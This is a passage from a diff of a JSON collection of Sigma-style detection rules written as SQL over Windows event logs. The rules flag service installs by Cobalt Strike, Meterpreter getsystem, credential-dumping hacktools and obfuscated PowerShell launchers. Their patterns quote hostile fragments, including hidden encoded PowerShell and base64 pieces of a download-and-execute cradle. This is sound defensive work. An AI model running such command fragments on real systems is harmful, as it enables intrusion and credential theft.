"description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ "attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM 